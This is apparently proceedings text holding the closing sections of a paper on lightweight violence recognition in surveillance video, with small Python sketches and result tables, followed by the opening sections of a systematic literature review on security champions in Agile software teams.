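    input_size: int = 224         # frames resized to 224 x 224
    optimizer: str = "adam"
    learning_rate: float = 1e-3
    batch_size: int = 8           # limited by GPU memory
    num_frames: int = 30          # must be a multiple of 3 for the TA module
    epochs: int = 1000

    def __post_init__(self):
        if self.num_frames % 3 != 0:
            raise ValueError("num_frames must be a multiple of 3")

    @property
    def inputs_per_clip(self):
        """Number of three-frame groups obtained from one clip."""
        return self.num_frames // 3
```

Validating the frame count at construction time makes the multiple-of-3 constraint explicit before any training starts.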
4.3 Efficiency Evaluation
To assess the efficiency of our proposal, we compute the number of parameters and FLOPs and compare them with the results of other prominent proposals identified in the Related Work section. See Table 3.

Table 3. Comparison of efficiency results with other proposals

Model                              #Params (M)  FLOPs (G)
C3D [12]                           78           40.04
I3D [14]                           12.3         55.7
3D CNN end to end [26]             7.4          10.43
ConvLSTM [18]                      9.6          14.4
3D CNN + DenseNet(2,4,12,8) [30]   4.34         5.73
Proposal SA+TA                     5.29         4.17
Proposal TA only                   5.29         0.15
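The entries of Table 3 can be compared directly with a few lines of arithmetic. The sketch below copies the values from the table and computes how many times fewer FLOPs one model needs than another; the dictionary layout and function names are illustrative assumptions.

```python
# (parameters in millions, FLOPs in G), copied from Table 3.
TABLE_3 = {
    "C3D": (78.0, 40.04),
    "I3D": (12.3, 55.7),
    "3D CNN end to end": (7.4, 10.43),
    "ConvLSTM": (9.6, 14.4),
    "3D CNN + DenseNet": (4.34, 5.73),
    "Proposal SA+TA": (5.29, 4.17),
    "Proposal TA only": (5.29, 0.15),
}


def flops_ratio(baseline, candidate):
    """How many times fewer FLOPs `candidate` needs than `baseline`."""
    return TABLE_3[baseline][1] / TABLE_3[candidate][1]


def lightest_model():
    """Name of the model with the fewest FLOPs in the table."""
    return min(TABLE_3, key=lambda name: TABLE_3[name][1])
```

For example, `flops_ratio("3D CNN + DenseNet", "Proposal TA only")` evaluates to about 38, which quantifies the gap between 5.73 and 0.15 GFLOPs.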
In terms of the number of parameters, 3D CNN + DenseNet(2,4,12,8) still outperforms our model, but only slightly. In terms of FLOPs, however, there is a large difference: the count drops from 5.73 G to 0.15 G. We conclude that our proposal has low computational complexity and can be deployed on lightweight devices with little computational power. We consider these results a contribution to the state of the art.

4.4 Accuracy Evaluation
To evaluate the quality of our proposal, the model was trained and tested with 5-fold cross-validation on the Hockey and Movie datasets, whereas the RWF-2000 dataset was split into 80% for training and 20% for testing. The results were then tabulated and compared with the accuracy of the proposals identified in the Related Work section; see Table 4. We took the RWF-2000 dataset as the main reference, as it has more videos and is more heterogeneous in its characteristics. On the Hockey dataset, our result (97.2%) is within about one percentage point of the best result, 98.3% for 3D CNN end to end [26]. On the Movie dataset, the result achieved is the maximum. Finally, on RWF-2000, our result (87.75%) is close to the best result, 89.3% for SPIL [33]. These results support the quality of our proposal and its contribution to the state of the art.
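The two evaluation protocols can be sketched as index-splitting routines. This is a minimal illustration, assuming that videos are shuffled with a fixed seed before splitting; the function names, the seed, and the shuffling itself are assumptions rather than details of our experiments.

```python
import random


def _shuffled_indices(n_videos, seed):
    """Return the indices 0..n_videos-1 in a reproducible random order."""
    indices = list(range(n_videos))
    random.Random(seed).shuffle(indices)
    return indices


def k_fold_splits(n_videos, k=5, seed=0):
    """Yield (train, test) index lists for k-fold cross-validation."""
    indices = _shuffled_indices(n_videos, seed)
    folds = [indices[i::k] for i in range(k)]
    for i, test in enumerate(folds):
        train = [j for f, fold in enumerate(folds) if f != i for j in fold]
        yield train, test


def holdout_split(n_videos, train_fraction=0.8, seed=0):
    """Return (train, test) index lists for a single hold-out split."""
    indices = _shuffled_indices(n_videos, seed)
    cut = round(n_videos * train_fraction)
    return indices[:cut], indices[cut:]
```

With the 1,000 Hockey videos, each fold trains on 800 videos and tests on 200; with the 2,000 RWF-2000 clips, the hold-out split gives 1,600 training and 400 test clips.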
Table 4. Comparison of accuracy results with other proposals

Model                              Hockey (%)  Movie (%)  RWF (%)
VGG-16+LSTM [27]                   95.1        99         –
Xception+Bi-LSTM [28]              98          100        –
Flow Gated Network [31]            98          100        87.3
SPIL [33]                          96.8        98.5       89.3
3D CNN end to end [26]             98.3        100        –
3D CNN + DenseNet(2,4,6,8) [30]    97.1        100        –
Proposal SA+TA                     97.2        100        87.75
Proposal TA only                   97.0        100        86.9

4.5 Real-Time Evaluation
As far as we know, there is no formal method for measuring whether a model can be used in real time. Following similar works [22,30], we measure the processing time for every 30 frames, taking a speed of 30 FPS as the reference.

Table 5. Latencies of our proposal on an Nvidia GeForce RTX 2080 Super

Model             Latency (ms)
Proposal SA+TA    12.2
Proposal TA only  10.8
Table 5 shows the result of this measurement on an Nvidia GeForce RTX 2080 Super graphics card. Taking 0 ms as ideal real time, both models are close to real time: in a real scenario, our proposal takes 0.0122 s (SA+TA) and 0.0108 s (TA only) to process 1 s of video. This demonstrates the efficiency and low latency needed for use in real scenarios and in real time. Comparing the two configurations, the SA+TA model is more accurate than the TA-only model but has higher FLOPs and latency; it can be used on devices with good computational power. The TA-only model has slightly lower accuracy but is very light in FLOPs and latency; it can therefore be used on devices with limited computing power.
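The relation between the measured latency and the real-time budget can be made explicit with a short calculation. The sketch below assumes, as in the text, that 30 frames at 30 FPS correspond to 1 s of video; the function name and the returned keys are illustrative.

```python
def real_time_margin(latency_ms, frames=30, fps=30.0):
    """Relate the latency for `frames` frames to their playback duration."""
    clip_ms = frames / fps * 1000.0
    return {
        "clip_duration_ms": clip_ms,
        # Fraction of the clip duration spent on processing (< 1 keeps up).
        "real_time_factor": latency_ms / clip_ms,
        # Frames that could be processed per second at this latency.
        "throughput_fps": frames / (latency_ms / 1000.0),
    }
```

For the SA+TA latency of 12.2 ms, the real-time factor is 0.0122, so processing occupies roughly 1.2% of the duration of the video on the tested graphics card.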
5 Discussion and Future Work
Regarding efficiency, Table 3 shows that our TA-only configuration has the best result in terms of FLOPs, with a value of 0.15 G. This is because the temporal attention module (TA) replaces the 3D CNN with a 2D CNN. Proposals based on 3D CNN extract spatio-temporal features, but at a high computational cost; a 2D CNN can extract spatial features, but not temporal ones. However, using T + 1 single-channel frames obtained by averaging the RGB channels, and feeding them to the 2D CNN as temporal information, reduces the computational cost considerably, although it does not yield the best accuracy.

Using the temporal attention module (TA) together with the spatial attention module (SA) improves the accuracy of the previous experiment by 0.2 and 0.85 percentage points on the Hockey and RWF datasets, respectively, while the result on the Movie dataset is unchanged (see Table 4). This improvement arises because the spatial attention module extracts regions of interest from each frame, eliminating the background and the color. However, the FLOPs increase by 4.02 G while the number of parameters remains at 5.29 M, which shows that using both modules improves accuracy slightly but at a high cost in FLOPs. Our goal is to recognize human violence in video surveillance in a real scenario and in real time; therefore, we propose using only the temporal attention module (TA).

In future work, we propose replacing the pretrained 2D CNN with other networks, such as the MobileNet versions, which could reduce the number of parameters or the FLOPs. To improve accuracy, other background extraction methods could be used that do not rely on the pooling and convolutional layers, since these layers are responsible for the increase in FLOPs.
6 Conclusions
We propose a new efficient model for recognizing human violence in video surveillance, designed for use in real time and in real situations. It uses a spatial attention module (SA) and a temporal attention module (TA). We demonstrate that a 2D CNN can extract temporal features from a video when the RGB color information of each frame is replaced with the time dimension. We show that our model has low computational complexity in terms of FLOPs, allowing it to be used on devices with low computational power, especially in real time. Our model is also very light in terms of the number of parameters, being only slightly outperformed by 3D CNN + DenseNet, and thus contributes to the state of the art. The proposal has a latency close to real time, taking 10.8 ms to process 30 frames. Finally, we present two variants of our proposal: one for devices with little computational power (TA only), and another for devices with better computational characteristics (SA+TA).
References
1. Gao, Y., Liu, H., Sun, X., Wang, C., Liu, Y.: Violence detection using oriented violent flows. Image Vis. Comput. 48–49(2015), 37–41 (2016). https://doi.org/10.1016/j.imavis.2016.01.006
2. Deniz, O., Serrano, I., Bueno, G., Kim, T.K.: Fast violence detection in video. In: VISAPP 2014 - Proceedings 9th International Conference on Computer Vision Theory Applications, vol. 2, December 2014, pp. 478–485 (2014). https://doi.org/10.5220/0004695104780485
3. Bilinski, P.: Human violence recognition and detection in surveillance videos, pp. 30–36 (2016). https://doi.org/10.1109/AVSS.2016.7738019
4. Zhang, T., Jia, W., He, X., Yang, J.: Discriminative dictionary learning with motion weber local descriptor for violence detection. IEEE Trans. Circuits Syst. Video Technol. 27(3), 696–709 (2017)
5. Deb, T., Arman, A., Firoze, A.: Machine cognition of violence in videos using novel outlier-resistant VLAD. In: 2018 17th IEEE International Conference on Machine Learning and Applications (ICMLA), pp. 989–994 (2018)
6. Simonyan, K., Zisserman, A.: Two-stream convolutional networks for action recognition in videos. In: Advances in Neural Information Processing Systems, vol. 1, no. January, pp. 568–576 (2014)
7. Feichtenhofer, C., Pinz, A., Zisserman, A.: Convolutional two-stream network fusion for video action recognition. In: Proceedings of the IEEE Computer Society Conference on Computer Vision and Pattern Recognition, December 2016, pp. 1933–1941 (2016). https://doi.org/10.1109/CVPR.2016.213
8. Zhang, B., Wang, L., Wang, Z., Qiao, Y., Wang, H.: Real-time action recognition with deeply transferred motion vector CNNs. IEEE Trans. Image Process. 27(5), 2326–2339 (2018). https://doi.org/10.1109/TIP.2018.2791180
9. Wang, L., Xiong, Y., Wang, Z., Qiao, Yu., Lin, D., Tang, X., Van Gool, L.: Temporal segment networks: towards good practices for deep action recognition. In: Leibe, B., Matas, J., Sebe, N., Welling, M. (eds.) ECCV 2016. LNCS, vol. 9912, pp. 20–36. Springer, Cham (2016). https://doi.org/10.1007/978-3-319-46484-8_2
10. Zhu, Y., Lan, Z., Newsam, S., Hauptmann, A.: Hidden two-stream convolutional networks for action recognition. In: Jawahar, C.V., Li, H., Mori, G., Schindler, K. (eds.) ACCV 2018. LNCS, vol. 11363, pp. 363–378. Springer, Cham (2019). https://doi.org/10.1007/978-3-030-20893-6_23
11. Ji, S., Xu, W., Yang, M., Yu, K.: 3D convolutional neural networks for human action recognition. IEEE Trans. Pattern Anal. Mach. Intell. 35(1), 221–231 (2013). https://doi.org/10.1109/TPAMI.2012.59
12. Tran, D., Bourdev, L., Fergus, R., Torresani, L., Paluri, M.: Learning spatiotemporal features with 3D convolutional networks. In: Proceedings of the IEEE International Conference on Computer Vision, vol. 2015, pp. 4489–4497 (2015). https://doi.org/10.1109/ICCV.2015.510
13. Qiu, Z., Yao, T., Mei, T.: Learning spatio-temporal representation with pseudo-3D residual networks. In: Proceedings of the IEEE International Conference on Computer Vision, vol. 2017-October, pp. 5534–5542 (2017). https://doi.org/10.1109/ICCV.2017.590
14. Carreira, J., Zisserman, A.: Quo Vadis, action recognition? A new model and the kinetics dataset. In: Proceedings - 30th IEEE Conference on Computer Vision and Pattern Recognition, CVPR 2017, vol. 2017-January, pp. 4724–4733 (2017). https://doi.org/10.1109/CVPR.2017.502
15. Dong, Z., Qin, J., Wang, Y.: Multi-stream deep networks for person to person violence detection in videos. In: Chinese Conference on Pattern Recognition, pp. 517–531 (2016)
16. Zhou, P., Ding, Q., Luo, H., Hou, X.: Violent interaction detection in video based on deep learning. J. Phys: Conf. Ser. 844(1), 12044 (2017)
17. Serrano, I., Deniz, O., Espinosa-Aranda, J.L., Bueno, G.: Fight recognition in video using Hough forests and 2D convolutional neural network. IEEE Trans. Image Process. 27(10), 4787–4797 (2018)
18. Sudhakaran, S., Lanz, O.: Learning to detect violent videos using convolutional long short-term memory. In: 2017 14th IEEE International Conference on Advanced Video and Signal Based Surveillance (AVSS), pp. 1–6 (2017)
19. Hanson, A., PNVR, K., Krishnagopal, S., Davis, L.: Bidirectional convolutional LSTM for the detection of violence in videos. In: Leal-Taixé, L., Roth, S. (eds.) ECCV 2018. LNCS, vol. 11130, pp. 280–295. Springer, Cham (2019). https://doi.org/10.1007/978-3-030-11012-3_24
20. Ulutan, O., Rallapalli, S., Srivatsa, M., Torres, C., Manjunath, B.S.: Actor conditioned attention maps for video action detection. In: Proceedings of IEEE Winter Conference on Applications of Computer Vision (WACV), pp. 516–525 (2020)
21. Meng, L., et al.: Interpretable spatio-temporal attention for video action recognition. In: Proceedings of IEEE/CVF International Conference Computer Vision Workshop (ICCVW), October 2019, pp. 1513–1522 (2019)
22. Kang, M.S., Park, R.H., Park, H.M.: Efficient spatio-temporal modeling methods for real-time violence recognition. IEEE Access 9, 76270–76285 (2021)
23. Tran, D., Wang, H., Torresani, L., Ray, J., LeCun, Y., Paluri, M.: A closer look at spatiotemporal convolutions for action recognition. In: Proceedings of IEEE/CVF Conference on Computer Vision Pattern Recognition, June 2018, pp. 6450–6459 (2018)
24. Qiu, Z., Yao, T., Mei, T.: Learning spatio-temporal representation with pseudo-3D residual networks. In: Proceedings of IEEE International Conference on Computer Vision (ICCV), October 2017, pp. 5534–5542 (2017)
25. Hanson, A., PNVR, K., Krishnagopal, S., Davis, L.: Bidirectional convolutional LSTM for the detection of violence in videos. In: Leal-Taixé, L., Roth, S. (eds.) ECCV 2018. LNCS, vol. 11130, pp. 280–295. Springer, Cham (2019). https://doi.org/10.1007/978-3-030-11012-3_24
26. Li, J., Jiang, X., Sun, T., Xu, K.: Efficient violence detection using 3D convolutional neural networks. In: Proceedings of 16th IEEE International Conference on Advanced Video and Signal Based Surveillance (AVSS), September 2019, pp. 1–8 (2018)
27. Soliman, M.M., et al.: Violence recognition from videos using deep learning techniques. In: Proceedings of 9th International Conference on Intelligent Computing and Information System (ICICIS), December 2019, pp. 80–85 (2019)
28. Akti, S., Tataroglu, G.A., Ekenel, H.K.: Vision-based fight detection from surveillance cameras. In: Proceedings of 9th International Conference on Image Process. Theory, Tools Application (IPTA), November 2019, pp. 1–6 (2019)
29. Traoré, A., Akhloufi, M.A.: 2D bidirectional gated recurrent unit convolutional neural networks for end-to-end violence detection in videos. In: Campilho, A., Karray, F., Wang, Z. (eds.) ICIAR 2020. LNCS, vol. 12131, pp. 152–160. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-50347-5_14
30. Huillcen Baca, H.A., Gutierrez Caceres, J.C., de Luz Palomino Valdivia, F.: Efficiency in human actions recognition in video surveillance using 3D CNN and DenseNet. In: Arai, K. (eds.) Advances in Information and Communication. FICC 2022. LNNS, vol. 438, pp. 342–355. Springer, Cham (2022). https://doi.org/10.1007/978-3-030-98012-2_26
31. Cheng, M., Cai, K., Li, M.: RWF-2000: an open large scale video database for violence detection. arXiv preprint arXiv:1911.05913 (2019)
32. Bermejo Nievas, E., Deniz Suarez, O., Bueno García, G., Sukthankar, R.: Violence detection in video using computer vision techniques. In: Real, P., Diaz-Pernil, D., Molina-Abril, H., Berciano, A., Kropatsch, W. (eds.) CAIP 2011. LNCS, vol. 6855, pp. 332–339. Springer, Heidelberg (2011). https://doi.org/10.1007/978-3-642-23678-5_39
33. Su, Y., Lin, G., Zhu, J., Wu, Q.: Human interaction learning on 3D skeleton point clouds for video violence recognition. In: Vedaldi, A., Bischof, H., Brox, T., Frahm, J.-M. (eds.) ECCV 2020. LNCS, vol. 12349, pp. 74–90. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-58548-8_5
Establishing a Security Champion in Agile Software Teams: A Systematic Literature Review

Hege Aalvik1, Anh Nguyen-Duc1,2(B), Daniela Soares Cruzes1, and Monica Iovan3

1 Norwegian University of Science and Technology, Trondheim, Norway
[email protected], [email protected]
2 University of South Eastern Norway, Bø i Telemark, Norway
[email protected]
3 Visma, Timisoara, Romania
[email protected]
Abstract. Security is increasingly recognized as an important aspect of software development processes. In agile software development, the adoption of security practices still faces many challenges because of the perception and management of software teams. A security champion is an important strategic mechanism for creating a better security culture; however, little is known about how such a role can be established. In this paper, we present the results of a systematic literature review investigating approaches to establishing and maintaining a security champion in an organization with Agile teams. Gathering empirical evidence from 11 primary studies, we present how the security champion is characterized, the conditions for establishing security champion programs, and the reported challenges in maintaining them. One of our main findings is a classification schema of 14 steps and 32 actions that can be taken to establish a security champion program. The study offers practical recommendations for organizations that want to establish or improve their security program in Agile teams.

Keywords: Security champion · Agile · Systematic literature review

1 Introduction
Software vulnerabilities continue to be a major security threat to software-intensive systems. They are often not discovered until late in the development cycle, causing delays and insecure software [25]. Most organizations have implemented processes to find and fix such vulnerabilities, but developers are often not included. Typically, developers and security experts work on separate teams and often communicate via formal channels [25]. Developers reportedly lack security training and understanding, which quite often results in insufficient assurance of security during software development [21]. In many cases, developers also see the responsibility for security as belonging to others and avoid engaging if possible [25]. This is a common problem in many software development companies and poses a challenge of coordinating and managing the security knowledge, roles and practices within a software team [13].
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023. K. Arai (Ed.): FICC 2023, LNNS 652, pp. 796–810, 2023. https://doi.org/10.1007/978-3-031-28073-3_53
As a response to this issue, an increasing number of companies are employing a so-called security champion role in their software teams. A security champion is a member of the development team who serves as an advocate for security [25]. The champion is typically a developer with an interest in security who volunteers for the role [23]. Typical tasks can be to show the team how to use cryptography libraries, authentication functions and key management, and, most importantly, to be a source of support for security functionality [13]. Because the security champion is a part of the development team, he or she can serve as an important liaison between the security specialists and the development team [25]. Having a security champion on a development team has been shown to be an effective strategy for creating a better security culture within the team, and thus more secure software [9]. A security champions program is an organizational initiative that improves security-related activities by drawing in stakeholders without formal cybersecurity experience.
To date, very few research studies have been undertaken to explore the success factors of security champions [11]. Researchers have investigated security champions and their impact on security, yet few address how to successfully maintain a security champion in a team or how to establish a security champions program [13]. There is therefore also a need to look at similar approaches in other disciplines to better understand how to implement security champions successfully in teams. This study aims at investigating the role of security champions, looking especially at the practical introduction and operation of security champions. We focus on the role in Agile projects and on theories from other disciplines.
From this objective we derive three research questions:
– RQ1 - Is there a reportedly consistent view on security champion in Agile software teams?
– RQ2 - What is reported from the software engineering literature about establishing and maintaining security champion roles in Agile software teams?
– RQ3 - Which challenges have been reported regarding the establishment and maintenance of security champion in Agile software teams?
The contribution of this work is twofold: (1) a comprehensive classification framework of activities to build a security champion program, and (2) a state-of-the-art overview of the conceptualization, implementations, challenges and practices of establishing security champion roles. The paper is organized as follows: Sect. 2 presents related work, Sect. 3 describes the research methodology, Sect. 4 reports the results, and Sects. 5 and 6 discuss and conclude the paper.
2 Related Work
2.1 Security Challenges in Agile Teams
According to a literature study by Oueslati et al. [20], there are security challenges related to almost all the agile principles. The authors mention 13 issues. One example is that security assessment favors detailed documentation, which goes against one of the four core values of the Agile manifesto. Another issue is that testing is, in general, insufficient to ensure the implementation of security requirements. Another study by Riisom et al. [22] discovered that one of the most significant difficulties for security in agile is “ensuring agile uniformity of operations”. This implies that the security activities come at the expense of the agile methods, which makes it complicated for the developers to implement the activities without abandoning agile principles. The second most noteworthy issue is “security that requires planning and design.” Because agile development emphasizes working software and quick reactions to change, thorough planning and detailed design will complicate the development process. It will be challenging to respond to change when the plan or design must be reexamined or altered to verify that security is still incorporated. Other issues mentioned in the paper are “time constraints”, “security is intangible”, “incomplete security needs”, “first-time integration of security”, “lack of security knowledge”, “security quality valued similarity to other characteristics”, and “motivation to continually correct security vulnerabilities”.
These studies reveal that even though security is present in agile software development to some degree, there are multiple issues relating to different values, principles, and technical and non-technical factors of the projects. These issues are also referred to as “incomplete security”, “first-time security integration”, and “intangible security needs”. As we see, there are many things to consider when it comes to software security in agile development. Implementing a security champion might not solve all the issues presented but might help mitigate some problems.
2.2 The Champion Role and Security Champions
Several definitions of champions have been proposed in the literature. Jenssen et al. propose the following definition: “A champion is an individual that is willing to take risks by enthusiastically promoting the development and/or implementation of an innovation inside a corporation through a resource acquisition process without regard to the resources currently controlled” [14]. An innovation is defined as “the introduction of new things, ideas, or ways of doing something” [2]. Due to increased turbulence, complexity, and global competition in organizational environments, there is a need for innovation to achieve competitiveness, survival, and profitability [17]. The goal of the champion is to draw attention to new ideas, needs, and possibilities and make organization members appreciate them [26]. Therefore, the presence of a champion can be essential for successful innovations, and thus for company competitiveness [14].
Typical personal characteristics of a champion are described in the literature as taking risks, being socially independent, and being socially clever. In addition, the ability to gain respect, loyalty, and trust is emphasized. Good champions should be motivated by new technology and what it can do for the company [14]. One of the main tasks of a champion is to convince fellow employees who are skeptical towards an innovation. Therefore, a champion should have the capability to inspire others to gain support for the innovation. To do this, the champion needs both technical and analytical skills [6]. The champion also needs the necessary authority. A breakthrough is more likely if the champion is recognized as one of the organization’s experts on the topic in question. Analytical skills are essential when budgeting, planning, and controlling central tasks [14].
Howell [12] proposed seven action steps that enterprise leaders can take to breed, rather than block, potential champions in their organizations:
1. Recruit and select potential champions even if they are difficult to manage.
2. Coach for skill development, covering not only technical skills but also leadership, communication and problem-solving skills.
3. Mentor for career development, supporting network building and fostering ideas.
4. Let champions volunteer for assignments that they crave.
5. Recognize innovation achievements with rewards and other recognition of results.
6. View failure as a learning opportunity and help champions learn from failure.
7. Raise the profile of champions, letting them “infect others” with their passion.
A security champion is not a new concept. Bostrom et al. [12] proposed “adding a security expert to every team” to improve security problems in software development. A security champion might be an active software developer who contributes to identifying and solving security issues early in their team [13]. It is suggested that requirements analysts, developers and architects can all become security champions, but not Product Owners and Program Managers, due to their availability. However, there should be a close connection between security champions and these roles, for support and for communicating the importance and value of the security work to the rest of the organization [13]. A security champions program is an organizational initiative that improves security-related activities by drawing in stakeholders without formal cybersecurity experience.
The development teams can serve as a platform for education and advice, while the security team can operate and perform in this platform [1]. The reported reasons for having a security champions program are:
– to have a focal point in the development team for further training and education;
– to scale the security team non-linearly within the organization;
– to improve the security capacity of individuals;
– to increase security influence earlier in the software life cycle, so that security is built in rather than bolted on.
3 Methodology
The goal of a Systematic Literature Review (SLR) is to find, examine and interpret relevant studies on the topic of interest [15]. To support further research on security champions in Agile software teams, we are motivated to survey current research about security champions and find gaps in the research area. We followed the guidelines proposed by Kitchenham [16] to perform the review. The objective of this SLR is to reveal evidence from the literature about security champions and especially to look at how to implement a security champions program. Two rounds of literature review were performed to identify the papers relevant to this research. In the first round, we conducted a systematic search, and in the second round, we conducted a manual snowballing search. As successfully done in our previous studies [18], this review was conducted following five steps:
1. Identification of research
2. Selection of primary studies
3. Study quality assessment
4. Data extraction and monitoring
5. Data synthesis
3.1 The Search Protocol
At first, we agreed on the search protocol, including the choice of databases, time frame and search string.
Database: The databases considered were IEEE Xplore, ACM Digital Library, Science Direct, Scopus, and Google Scholar, because they are all credible and offer good search functionality. Databases were ruled out by checking the number of articles returned by the search string “security champion”. Because Scopus contains most of Science Direct’s database, Science Direct was excluded. Google Scholar was excluded later in the process because it did not supply the needed search functionality.
Timeframe: Since the research subject is relatively new, the search period was limited to 2016–2022.
Search String Development. The search string for the systematic literature review was developed using a technique suggested by Kitchenham [16]. Kitchenham recommends considering the research question from four viewpoints:
1. Population: papers about security champion
2. Intervention: the context is Agile software development projects
3. Outcomes: security
4. Context.
Because ACM Digital Library and IEEE Xplore lack TITLE-ABS capabilities, ABS had to be used in place of TITLE-ABS. As a result, there are two distinct search strings. After adding synonyms and experimenting with several variations, the final search strings were as follows:
#1 (champion*) AND (agile OR scrum OR xp OR devops OR team*) AND TITLE-ABS(security OR cybersecurity OR secure)
#2 (champion*) AND (agile OR scrum OR xp OR devops OR team*) AND ABS(security OR cybersecurity OR secure)
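To make the logic of the two search strings concrete, the following minimal Python sketch evaluates them against a bibliographic record. It is an illustration only and not the tooling used in the review: the `Record` fields, the helper names, and the whole-word matching with a trailing `*` treated as a prefix wildcard are assumptions, and real databases such as Scopus apply their own tokenization and stemming rules.

```python
import re
from dataclasses import dataclass


@dataclass
class Record:
    """Hypothetical bibliographic record; field names are assumptions."""
    title: str
    abstract: str
    keywords: str = ""


def has_term(text: str, term: str) -> bool:
    """Whole-word, case-insensitive match; a trailing * matches any suffix."""
    if term.endswith("*"):
        pattern = r"\b" + re.escape(term[:-1]) + r"\w*"
    else:
        pattern = r"\b" + re.escape(term) + r"\b"
    return re.search(pattern, text, flags=re.IGNORECASE) is not None


def any_term(text: str, terms: list[str]) -> bool:
    """OR-group: true if at least one term of the group occurs in the text."""
    return any(has_term(text, t) for t in terms)


CHAMPION = ["champion*"]
CONTEXT = ["agile", "scrum", "xp", "devops", "team*"]
SECURITY = ["security", "cybersecurity", "secure"]


def matches(record: Record, abstract_only: bool = False) -> bool:
    """Search string #1 by default; abstract_only=True mimics #2 (ABS)."""
    all_fields = " ".join([record.title, record.abstract, record.keywords])
    if abstract_only:
        restricted = record.abstract
    else:
        restricted = record.title + " " + record.abstract
    # The three OR-groups are combined with AND, as in the search strings.
    return (any_term(all_fields, CHAMPION)
            and any_term(all_fields, CONTEXT)
            and any_term(restricted, SECURITY))
```

Under these assumptions, a record whose title contains "Security" but whose abstract does not would be returned by string #1 and missed by string #2, which is one reason the two variants may yield different result sets across databases.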
Inclusion and Exclusion Criteria: A study is added to the set of primary studies if it satisfies all inclusion criteria and none of the exclusion criteria. We used the following inclusion and exclusion criteria.
– IC1 - Studies investigating security experts, security roles or security programs in a software development project
– IC2 - Studies explicitly characterizing Agile as the project context
– IC3 - Studies adopting an empirical research method
– EC1 - Studies not written in English
– EC2 - Studies for which the full text is not available
– EC3 - Secondary or tertiary studies
3.2 The Systematic Search
Fig. 1. Systematic Search Process
The number of papers found using the search string is shown in Fig. 1. The review was conducted between September 2021 and February 2022. As shown in Fig. 1, the search process was conducted in two phases, followed by data extraction and analysis. Most of the search work was conducted by the first author. All authors met frequently to discuss the search protocol, the results of the pilot search, the systematic search and the data extraction. The number of selected papers after each step of the search is also given in Fig. 1. The original scope was papers from 2016 to the present due to the newness of the investigated phenomenon. However, we extended the scope to papers from 2010 to 2021. After removing duplicates, we had a list of 358 papers. The unfiltered search results were stored and preserved in EndNote for potential reanalysis. After two rounds of selecting papers using title, abstract and full text, we ended up with only seven relevant primary studies.
3.3 The Ad Hoc Search
An ad hoc review was conducted to find models and ideas that could be mapped to the security champion theories that had already been discovered. The strategy consisted of starting from a paper already known to contain a relevant champion theory and investigating the papers citing it. We used three seed papers that were given by experts in the field. Both Google Scholar and Scopus were used as databases for the search. The initial collection of studies contained 1601 papers. The selection process started by excluding papers by title and abstract. Then the full text was read, and relevant papers were included. The papers found using Google Scholar had to be reviewed before removing duplicates because it was not possible to download all the references at once. Therefore, the papers from the two databases were examined separately before all the papers included based on title and abstract were gathered. Then duplicates across the two databases were removed, and papers were excluded based on the full text. The review resulted in four papers describing models that could be used to understand how to implement a security champion in a team. No time period restriction was applied to the papers. At the end of the process (Sect. 3.2 and Sect. 3.3), we had found 11 relevant primary studies, as shown in Table 1.
3.4 Data Extraction and Analysis
We defined a classification schema that focuses on the categories and actual activities in a security champion program. Data from each of the selected primary studies were then systematically extracted into the classification schema, according to the predetermined attributes: (1) security champion definition, (2) activity category, (3) detailed actions, (4) study context, (5) research method, (6) study contribution type and (7) publisher. The chosen attributes were inspired by previous mapping studies in software engineering [7,8].

Table 1. Papers Included in the Study
Study | Authors | Title | Round
S1 | M. Jaatun and D. Cruzes (2021) [13] | Care and Feeding of Your Security Champion | 1
S2 | M. Alshaikh (2020) [3] | Developing cybersecurity culture to influence employee behavior: A practice perspective | 1
S3 | M. Alshaikh and B. Adamson (2021) [4] | From awareness to influence: toward a model for improving employees’ security behaviour | 1
S4 | J. Haney and W. Lutters (2017) [11] | The Work of Cybersecurity Advocates | 1
S5 | J. Haney, W. Lutters and J. Jacobs (2021) [10] | Cybersecurity Advocates: Force Multipliers in Security Behavior Change | 1
S6 | T. W. Thomas, M. Tabassum, B. Chu and H. Lipford (2018) [25] | Security During Application Development: an Application Security Expert Perspective | 1
S7 | I. Ryan, U. Roedig and K. J. Stol (2021) [23] | Understanding Developer Security Archetypes | 1
S8 | I. Okere, J. van Niekerk and M. Carroll (2012) [19] | Assessing Information Security Culture: A Critical Analysis of Current Approaches | 2
S9 | J. van Niekerk, R. von Solms (2005) [27] | A holistic framework for the fostering of an information security sub-culture in organizations | 2
S10 | J.M. Howell (2005) [12] | The right stuff: Identifying and developing effective champions of innovation | 2
S11 | C.M. Shea (2021) [24] | A conceptual model to guide research on the activities and effects of innovation champions | 2
4 Results
4.1 RQ1 - Is There a Reportedly Consistent View on Security Champion in Agile Software Teams?
The description of the security champion role was similar in all the papers on Agile software development. The most commonly mentioned characteristics of a security champion are shown in Fig. 2. A recurring theme is that the champion is there to support the team, not to do all the security work themselves. The descriptions found match the general definition from the background, where a champion is defined as an individual who is “(...) enthusiastically promoting the development and/or implementation of an innovation inside a corporation (...)”.
Fig. 2. Characteristics Defining the Security Champions Role in Agile Literature.
Some of the papers mention typical personality characteristics of a security champion. The most prominent characteristics are enthusiasm for their profession, a desire to be of service to others, striving towards a “better good”, excellent communication skills, the ability to develop relationships, and solid people skills [10,11]. Another point emphasized is that a security champion does not have to be an IT specialist but might have a background in communication, marketing, or education [10]. A security champion should also be present among security experts and maintain frequent training to keep up to date with the latest practices, methodologies and tooling in order to share this knowledge. A security champion should disseminate security best practices and raise and maintain continual security awareness around issues within their team and further in their organization. A security champion can get his or her teammates’ buy-in by communicating security issues in a way they understand, in order to produce secure products early in the software life cycle.
4.2 RQ2 - What Is Reported from the Software Engineering Literature About Establishing and Maintaining Security Champion Roles in Agile Software Teams?
Fig. 3. Percentage of Papers Including a Category.
Papers from both literature reviews propose concrete actions that can help explain how to establish and maintain a champions program. From the primary studies, we extracted 14 possible steps (C1 to C14) in a security champion program: (1) manage the program, (2) define roles, (3) assess candidates, (4) recruit candidates, (5) training, (6) communication, (7) meetings, (8) control resources, (9) give feedback, (10) automate champion activities, (11) allocate time, (12) keep motivation, (13) request services, and (14) evaluate results. The percentage of papers addressing each of these 14 steps is shown in Fig. 3. The 32 detailed actions (A1 to A32) defined and reported for these steps are shown in Table 3. The paper S1 is a case study investigating two different companies. The companies use different actions and are therefore presented in two separate columns in the following tables, namely S1.1 and S1.2. We observed that no study reported a case where all the steps or all the actions were adopted. Some steps are more common than others, for instance C1 - stakeholder management, C4 - recruitment and C9 - feedback loop management.
